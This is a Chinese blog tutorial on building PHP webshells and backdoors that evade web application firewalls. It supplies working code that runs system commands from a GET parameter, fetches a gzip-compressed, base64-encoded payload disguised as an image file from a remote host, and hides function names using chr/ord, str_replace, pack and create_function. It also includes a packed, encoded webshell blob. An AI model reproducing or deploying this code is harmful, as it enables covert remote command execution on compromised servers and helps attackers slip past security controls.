0x1

直接在字符串变量后面加括号, 会调用这个函数:

<?php

$s = 'system';

$e = 'assert';

$s('whoami');

$e('phpinfo();');

0x2

执行命令常用的函数有:

system('命令')

eval('php code')

assert('php code')

这三个最常用

0x3

base64_encode/base64_decode

<?php

$b = base64_encode('whoami');

echo $b.'<br />';

echo base64_decode($b).'<br />';

0x4

gzcompress/gzuncompress 压缩数据

<?php

$c = gzcompress('whoami');

echo $c.'<br>';

echo gzuncompress($c)."<br />";

0x5

从上面的命令执行, base64加解64编码与gz压缩, 我们可以写一个这样的后门。

先把后门压缩, 再把后门base64_encode(base64编码后防止字符原因代码出错)。

如果后门是一个php代码的话, 在最后我们可以用assert或eval执行它。

在php中, 有一个这样的函数:

file_get_contents(url)

用这个函数可以远程获取文件内容保存到变量中:

$shell = file_get_contents('http://localhost/shell.jpg')

开始测试, 从最简单例子开始。

制作gzcompress与base64_encode编码过的文件:

<?php

$c = 'system';

$data = gzcompress($c);

$file_data = base64_encode($data);

echo $file_data;

fwrite(fopen('shell.txt', 'w'), $file_data);

这样我们就创了一个压缩后再64编码的system字符串

使用:

<?php

$c = file_get_contents('http://localhost/shell.txt');

#获取数据

$s = gzuncompress(base64_decode($c));

#解密数据

$s($_GET[session]);

#执行命令

那么问题来了, 我们为什么要转了一大圈再回来呢?

原因很简单, 就是你压缩后的数据, 有可能一些WAF并不会检测到内容存在危险。

0x6

ascii转码函数: chr/ord

<?php

$str = 'system';

for($count = 0; $count < strlen($str); $count++){

    echo substr($str, $count, 1).'~'.ord(substr($str, $count, 1)).'<br />';

}
/*
s~115
y~121
s~115
t~116
e~101
m~109*/

0x7

str_replace字符替换函数:

<?php

$s = str_replace('p','','pspypsptpepmp');

echo $s;
#system

0x8

create_fuction()创建匿名函数:

<?php

#create_function('参数列表', 'php代码字符串');

$info = create_function('','phpinfo();');

$info();

0x9

pack函数

pack('格式', 十六进制字符串)

pack函数有点复杂, 但不常用, 如果你要把一个十六进制转成字符, 可以这样:

<?php

$x = bin2hex('system');

$s = PACK('H*', $x);

echo $s.'<br />';

$s('whoami');

pack关键用法就是, 我们可以把一些第感的函数, 先转成16进制, 再 pack回来。

比如, create_function('', $shell)中, $shell为php code代码, 我们可以在php code中利用隐藏一些敏感函数。

<?php

$shell=PACK('H*','2470617373776F72643D27').$password.

PACK('H*','273B247368656C6C6E616D653D27').$Username.

PACK('H*','273B246D7975726C3D27').$Url.

PACK('H*','273B6576616C28677A756E636F6D7072657373286261736536345F6465636F64652827').'

eJzs/Xt3HNd5Jor/zazl71Buw2rAwqXu1UUQsOpKgheABEBSlK

iD02g0gCYaaKi7QYCi+GEczZxoHM+KJetiWzdbkmNZsi1FkmXH

yzOT8WQyk/HPcybJTJKZJLN+z7N3VXVVX0BQtpPJOoZEoLtq3/

d73+/77tb6WqdbbXfHJ2Y/8zsb9c3GXn28vHunurHRrnc65cmx

tZVo+Vq0/Hh5JVheuLy6Fi9cjBa9S1H5iXyN/Vanu18VFfjnsN

XeyL/ubNebzb3qbh3vs8/FHg/aTbwUf/misTn+yFa9u7Zb3WrU

.......

$f = create_function('', $shell);

$f();

pack用法可以参孝一下这里: perl pack

总结

创建一个gz压缩再base64编码的文件(如 logo.png), 利用file_get_contents获取。

利用str_replace/chr/ord/create_fuction函数绕过一些WAF检测。

php webshell常见函数的更多相关文章

  1. [转]中国最大的Webshell后门箱子调查,所有公开大马全军覆没

    起因 对这件事情的起因是某天我渗透了一个大站,第二天进webshell时就发现,当前目录出现了新的后门,仔细一查,发现是博彩团伙干的,网站被全局劫持黑帽程序如下代码 set_time_limit(); ...

  2. Java类WebServer及中间件拿webshell方法总结

    0.序 原文名称:Tomcat.Weblogic.JBoss.GlassFish.Resin.Websphere弱口令及拿webshell方法总结 原文from:http://www.hack80.c ...

  3. 一篇说尽Excel常见函数用法

    一篇说尽Excel常见函数用法 Word,PPT,Excel这三个Office软件是职场办公里最常用的三个软件,但是我发现简书上写PPT的教程多,Excel的少,即使有,也是零零散散.因为Excel的 ...

  4. WebLogic 12c控制台上传获取webshell

    WebLogic 默认端口7001,一般可以通过这样来访问 http://10.9.1.1:7001/console 控制台 通过弱口令weblogic/weblogic登录控制台,下一步获取如何上传 ...

  5. 利用网络流传的WebShell默认密码库寻找WebShell

    声明:本文提到的技术,仅可用作网络安全加固等合法正当目的.本文作者无法鉴别判断读者阅读本文的真实目的,敬请读者在本国法律所允许范围内阅读本文,读者一旦因非法使用本文提到技术而违反国家相关的法律法规,所 ...

  6. 各种隐藏 WebShell、创建、删除畸形目录、特殊文件名、黑帽SEO作弊(转自核大大)

    其实这个问题,经常有朋友问我,我也都帮大家解决了…… 但是现在这些现象越来越严重,而且手法毒辣.隐蔽.变态,清除了又来了,删掉了又恢复了,最后直接找不到文件了,但是访问网站还在,急的各大管理员.站长抓 ...

  7. 当一名黑客获得一份WebShell后,会做什么

    当你获得一份webshell后,你会干嘛? 我曾获得N多webshell.什么discuz.dedecms.phpwind.phpweb.aspcms等等,甚至还包括N多自己研发的线上平台. 可是,问 ...

  8. Deformity JSP Webshell、Webshell Hidden Learning

    catalogue . JSP基础语法 . JSP Lexer By Lua . Open Source Code Analyzers in Java . WEBSHELL Samples . she ...

  9. Deformity ASP/ASPX Webshell、Webshell Hidden Learning

    catalog . Active Server Page(ASP) . ASP.NET . ASP WEBSHELL变形方式 . ASPX WEBSHELL变形方式 . webshell中常见的编码转 ...

随机推荐

  1. Linux 重定向输出到多个文件中

    转自:http://codingstandards.iteye.com/blog/833695 用途说明 在执行Linux命令时,我们可以把输出重定向到文件中,比如 ls >a.txt,这时我们 ...

  2. oracle锁与死锁概念,阻塞产生的原因以及解决方案

    锁是一种机制,一直存在:死锁是一种错误,尽量避免.​ 首先,要理解锁和死锁的概念:​ 1.锁: 定义:简单的说,锁是数据库为了保证数据的一致性而存在的一种机制,其他数据库一样有,只不过实现机制上可能大 ...

  3. bzoj2699 更新

    题意 对于一个数列A[1..N],一种寻找最大值的方法是:依次枚举A[2]到A[N],如果A[i]比当前的A[1]值要大,那么就令A[1]=A[i],最后A[1]为所求最大值.假设所有数都在范围[1, ...

  4. varnish启动报错

    错误1.Starting Varnish Cache: Error: Cannot open socket: :80: Address family not supported by protocol ...

  5. Golang的第一个程序-Hello, World !

    安装Golang: 1. 下载安装包 https://golang.google.cn/dl/ 我这里使用压缩包,下载后解压到D盘(自定义). 2. 添加环境变量:把解压后的bin目录添加到环境变量中 ...

  6. 51nod 1317 相似字符串对(容斥原理+思维)

    题意: 称一对字符串(A,B)是相似的,当且仅当满足以下条件: (1)字符串A和B都恰好包含N个字符: (2)A和B串中的每个字符都是小写字母的前k个字符,即A.B中只可能出现'a','b','c', ...

  7. Tribles UVA - 11021(全概率推论)

    题意: 有k只麻球,每只只活一天,临死之前可能会出生一些新的麻球, 具体出生i个麻球的概率为P,给定m,求m天后麻球全部死亡的概率. 解析: 从小到大,先考虑一只麻球的情况  设一只麻球m天后全部死亡 ...

  8. 洛谷 P2056 [ZJOI2007]捉迷藏 解题报告

    P2056 [ZJOI2007]捉迷藏 题目描述 Jiajia和Wind是一对恩爱的夫妻,并且他们有很多孩子.某天,Jiajia.Wind和孩子们决定在家里玩捉迷藏游戏.他们的家很大且构造很奇特,由\ ...

  9. Linux 内核分析第八周学习笔记

    Linux 内核分析第八周学习笔记 zl + 原创作品转载请注明出处 + <Linux内核分析>MOOC课程http://mooc.study.163.com/course/USTC-10 ...

  10. Canny边缘检测算法原理及其VC实现详解(二)

    转自:http://blog.csdn.net/likezhaobin/article/details/6892629 3.  Canny算法的实现流程 由于本文主要目的在于学习和实现算法,而对于图像 ...